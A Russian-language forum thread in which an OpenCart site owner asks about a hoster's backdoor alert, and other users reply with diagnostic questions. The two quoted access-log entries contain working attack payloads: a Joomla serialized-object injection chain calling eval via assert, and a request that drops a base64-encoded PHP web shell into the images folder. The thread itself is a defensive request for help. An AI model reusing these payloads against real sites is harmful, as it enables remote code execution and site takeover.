Добрейшего дня! Сегодня пришло письмо от хостера : Бла-бла-бла Вредоносный контент! Бла-бла-бла /home/*****ru/logs/*****.ru- Jan-2016.gz: PHP.HostComm.#239333.PHP.BackDoor.remote.exec.inj.1.UNOFFICIAL Это как бы лог файл хостера Покопавшись нашел лишь два подозрительных момента (повторяются несколько десятков раз, см. в конце сообщения) Посему вопросы - "А был ли мальчик?" - Что за PHP.HostComm.#239333, вернее какие признаки наличия этой уязвимости? Может не то в логах смотрел? - Если все же был взлом, что могли поломать/спереть? - Есть ли актуальная инфа о текущих уязвимостях Opencart по типу http://www.waraxe.us/advisory-84.html Ю но более свежая 2.1.X.X+ ? - Со стандартным .htaccess в корне что то дополнительно надо сделать? например, magic quotes отрубать? Они включены почему то Логи спрятаны. Админка спрятана, .htaccess в ней прописан на мои IP . Заранее благодарю! ------------------------------------------------------------------------------ 4094 188.165.242.205 - - [08/Jan/2016:17:55:19 +0300] "POST / HTTP/1.1" 503 315 "-" "}__test|O:21:\"JDatabaseDriverMysqli\":3:{s:2:\"fc\";O:17:\"JSimplepieFactory\":0:{}s:21:\"\\0\\0\\0disconnectHandlers\";a:1:{i:0;a:2:{i:0;O:9:\"SimplePie\":5:{s:8:\"sanitize\";O:20:\"JDatabaseDriverMysql\":0:{}s:8:\"feed_url\";s:162:\"eval(chr(101).chr(99).chr(104).chr(111).chr(34).chr(120).chr(121).chr(105).chr(110).chr(105).chr(122).chr(100).chr(97).chr(34).chr(59));JFactory::getConfig();exit\";s:19:\"cache_name_function\";s:6:\"assert\";s:5:\"cache\";b:1;s:11:\"cache_class\";O:20:\"JDatabaseDriverMysql\":0:{}}i:1;s:4:\"init\";}}s:13:\"\\0\\0\\0connection\";b:1;}\\xf0\\xfd\\xfd\\xfd" 17178 91.207.6.18 - - [14/Jan/2016:12:39:34 +0300] "GET /?1=%40ini_set%28%22display_errors%22%2C%220%22%29%3B%40set_time_limit%280%29%3B%40set_magic_quotes_runtime%280%29%3Becho%20%27-%3E%7C%27%3Bfile_put_contents%28%24_SERVER%5B%27DOCUMENT_ROOT%27%5D.%27/images/al277.php%27%2Cbase64_decode%28%27PD9waHAgZXZhbCgkX1BPU1RbMV0pOz8%2B%27%29%29%3Becho%20%27%7C%3C-%27%3B HTTP/1.1" 404 24451 "-" "}__test|O:21:\"JDatabaseDriverMysqli\":3:{s:2:\"fc\";O:17:\"JSimplepieFactory\":0:{}s:21:\"\\0\\0\\0disconnectHandlers\";a:1:{i:0;a:2:{i:0;O:9:\"SimplePie\":5:{s:8:\"sanitize\";O:20:\"JDatabaseDriverMysql\":0:{}s:8:\"feed_url\";s:46:\"eval($_REQUEST[1]);JFactory::getConfig();exit;\";s:19:\"cache_name_function\";s:6:\"assert\";s:5:\"cache\";b:1;s:11:\"cache_class\";O:20:\"JDatabaseDriverMysql\":0:{}}i:1;s:4:\"init\";}}s:13:\"\\0\\0\\0connection\";b:1;}\xf0\x9d\x8c\x86"
1. Это не ошибка движка 2. Модули с варезопомоек все с вирусами и бекдорами. Устанавливали? 3. Какой файл заражен? 4. Какой хостер. 5. Комп чист без вирусов? 6. Проги на компе купленные или как всегда с скаченные на халяву? 7. ...... остальные подхватят добавят вопросы..
2. Модули - только штатные + 2 модуля в темплейте ( http://themeglobal.com/opencart/themegloballite/ ) Качан c сайта создателей, не с помойки. 3. В том то и дело что хостинг нашел только один признак зловреда - в СВОЕМ файле логов. В файлах сайта по их мнению чисто 4. Хостер HC.RU Уже лет 5 с ними знаком, бывают и ложные тревоги , даже по дырявой джумле была пара "ложняков" 5. и 6. - виртуалка , винда, антивирь, firefox, filezilla, notepad++, Gimp . Кстати, просто для инфы, обычная винда, в не зависимости от способа активации, содержит такое количество дыр, что мама не горюй. Но это лирика P.S. пока ни на один из вопросов моего поста ответа нет
))) тогда наверно с них нужно требовать чтобы проверили что такое. Хостинги тоже дырявые бывают. Хостеры по логу должны ответить, что это такое было.
Спасибо! Осталось два момента: - Есть ли актуальная инфа о текущих уязвимостях Opencart по типу http://www.waraxe.us/advisory-84.html , но более свежая 2.1.X.X+ ? - Со стандартным .htaccess в корне что то дополнительно надо сделать? например, magic quotes отрубать? Они включены почему то
Может кто-то пытался оформить заказ или оставить комментарий к товару а в тексте была какая-то подозрительная хрень?
